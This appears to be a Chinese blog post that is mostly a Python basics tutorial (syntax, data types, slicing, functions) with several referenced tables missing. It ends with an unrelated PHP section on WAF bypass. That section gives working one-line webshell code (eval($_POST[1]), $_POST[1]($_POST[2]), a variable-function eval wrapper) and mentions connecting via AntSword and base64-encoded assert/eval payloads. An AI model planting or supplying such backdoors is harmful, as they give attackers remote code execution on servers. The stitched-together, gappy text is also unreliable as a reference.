Python知识点以及assert和eval的案例复现

Python知识点

摘要：
本文主要介绍一些平时经常会用到的python基础知识点，用于加深印象，也算是对于学习这门语言的一个总结与回顾。python的详细语法介绍可以查看官方编程手册，也有一些在线网站对python语法进行了比较全面的介绍，比如菜鸟教程：
python3 教程|菜鸟教程
为了方便聚焦知识点，本文涉及的操作实例并不多，想学好一门语言关键还得自己多编码多实践。
python语言介绍

python是一门解释型语言，python的设计目标：

①一门简单直观的语言并与主要竞争者一样强大
②开源，以便任何人都可以为它做贡献
③代码像纯英语那样容易理解
④适用于短期开发的日常任务

设计哲学是：

优雅
明确
简单

python的基础语法

标识符

第一个字符必须是字母表中字母或下划线 。
标识符的其他的部分由字母、数字和下划线组成。
标识符对大小写敏感。

注释

类型	                   语法
单行注释	    以 # 开头，编程规范建议#后面跟一个空格
多行注释	    用一对连续的三个引号，单引号或者双引号均可（"""/’’’）

行与缩进

python与其他语言明显的区别是没有大括号，而是用缩进表示代码块。
另外，每行语句不需要以分号结束。

多行语句

如果语句很长，可以使用反斜杠()来实现多行语句
说明：在 [], {}, 或 () 中的多行语句不需要使用反斜杠

算术运算符

判断语法

if else语句

if 和 else用于对条件进行判断并进行处理，语法如下：

if 要判断的条件:
条件成立时要做的事情
…
else:
条件不成立时要做的事情

逻辑运算符

对于同时判断多个条件的情况可以用逻辑运算符，有如下三种：
符号 说明 语法
and 与，两个都成立才返回True 条件1 and 条件2
or 或，两个只要有一个满足就返回True 条件1 or 条件2
not 非，对条件取反 not 条件
elif 语句

elif语句用于有多个条件进行判断的场景，语法如下：

if 条件1:
	条件1满足时执行的代码
elif 条件2:
	条件2满足时执行的代码
elif 条件3:
	条件3满足时执行的代码
else:
	以上都不满足时执行的代码

python数据类型介绍

列表

列表(list)是python中使用最频繁的数据类型，类似其他语言的数组
列表的符号是中括号[]，初始化一个列表语法如下：

program_list = ["c++", "java", "python", "php"]

元组

元组(tuple)与列表类似，区别是元组的数据不能修改，元组的符号是小括号()，初始化一个元组的语法如下：

program_tuple = ("c++", "java", "python", "php")

元组主要用于函数的参数和返回值，格式化字符串，以及保护列表数据，由于元组的数据无法修改，因此提供的方法也比较少：

元组在python中还可以用于交换两个变量的值:

a = 10
b = 9
a, b = (b, a)

字典

字典(dict)通常用于描述一个物体的相关信息，使用键值对存储数据，键必须唯一，由于要使用hash算法，只有不可变类型才能用作键，字典的符号是大括号{}，初始化一个字典的语法如下：

human_dic = {"name": "zhangsan",
			"age": 26,
			"height": 1.75,
			"weight": 66}

字典的常用操作函数如下：

字符串

字符串(str)的使用也非常广泛，可以使用引号('或")来创建字符串，初始化一个字符串的语法如下：

testStr = "Wasting time is robbing oneself"

python对于str提供了很多实用的方法，比较常用的有以下这些：

对字符串进行判断的方法：

对字符串进行修改(包括格式化，大小写转换)：

字符串的查找和替换：

运算符

高级数据类型同样支持以下常见的运算符：

切片

切片使用索引值可以方便地截取容器中一定范围的数据，适用于列表，元组，字符串。
切片语法如下：
item[N:M:S]
其中N表示要截取的开始位置，M表示结束位置，S表示step也就是步长，默认是1，截取的时候[N:M]是个半闭合区间，等效于数学上[N,M)取值范围，取N不取M, N和M都可以省略。python中，-1可以表示最后一个元素，字符串利用切片完成翻转的代码如下：

>>> test_str = "Hello World"
>>> print(test_str[::-1])

python函数语法

在python中定义一个函数需要使用def关键字，相比其他语言，返回值不需要声明，定义一个函数的语法如下：

def print_hello():
	print("Hello, World!")

缺省参数

除了常见的必须参数外，python支持缺省参数，即为参数指定一个默认值，可以不传入这个参数，代码例子如下：

def print_human(name, age = 23):
	print("body info: name is %s, age is %s" % (name, age) )
	
print_human("wangwu")
print_human("lisi", 25)

多值参数

如果函数处理的参数的个数不确定，就可以用多值参数：

参数名前面增加一个*可以接收元组
参数名前面增加两个*可以接收字典

使用了这两个多值参数的代码例子如下：

def print_info(*args, **kwargs):
	print(args)
	print(kwargs)
	
program_list = ["c++", "java", "python", "php"]
human_dic = {"name": "zhangsan", "age": 26, "height": 1.75, "weight": 66}
	
print_info(*program_list, **human_dic)

返回多个值

python中可以利用元组返回多个值，多个返回值的代码如下：

def measure_rect():
	width = 12
	height = 6
	return width, height

w, h = measure_rect()
print("width is %d, height is %d" % (w, h))

python常用函数

print输出函数

python使用print函数将信息输出到控制台，输出数据时经常会用到格式化操作符，不同的格式化字符串含义如下表：

语法格式如下：

print("格式化字符串" % 变量1)
print("格式化字符串" % (变量1, 变量2...))

print函数默认会自动在内容末尾增加换行，如果不希望换行，可以用end参数指定需要输出的内容
语法格式如下：

print("Hello word!", end="")

input输入函数

使用input函数从键盘等待用户的输入，默认都是一个字符串
语法格式如下：

字符串变量 = input("提示信息：")

类型转换函数

常见的类型转换函数如下：

assert和eval的成功与失败

当我们要去绕过一个wef的时候，我们写一个不含数字字母的代码在正常情况下这就显得太长了，会被检测出来，所以我们要用去减少长度，这时候就可以用一句话木马，一句话木马的原理即可以执行传递上来变量的内容,变量名称即“一句话木马，例如

<?php
eval($_POST[1]);
?>

我们打开小皮面板后，打开阿帕奇，然后打开中国蚁剑进行连接

接下来我们加入一点代码：

 <?php
    $_POST[1]($_POST[2]);
    ?>

eval其实并不能算是‘函数’，而是PHP自身的语言结构，如果需要用‘可变’的方式调用，需要自己构造，类似这样子的：

<?php
function eval_1($str)
{
   eval($str);
}
 
$a='eval_1';
$a('phpinfo()');
?> 

接下来我将编码方式改成了base64发现也可以成功连接

最后总结：
这是因为我们的eval函数中参数是字符，assert函数中参数为表达式 （或者为函数），比如

assert(eval(‘echo 1;’));//类似这样
1=assert
2=eval(base64_decode())
$_POST['1']($_POST[2])
assert(eval(base64_decode))

我们多了一个eval函数，实质上我们是在执行assert(eval()),所以是可以执行的。
assert(‘adsadasdsadasdasdsa’) 里面只有字符串
assert(eval(base64dddddd)); 里面有eval函数

eval函数中参数是字符，如：
eval('echo 1;');
assert函数中参数为表达式 （或者为函数），如：
assert(phpinfo())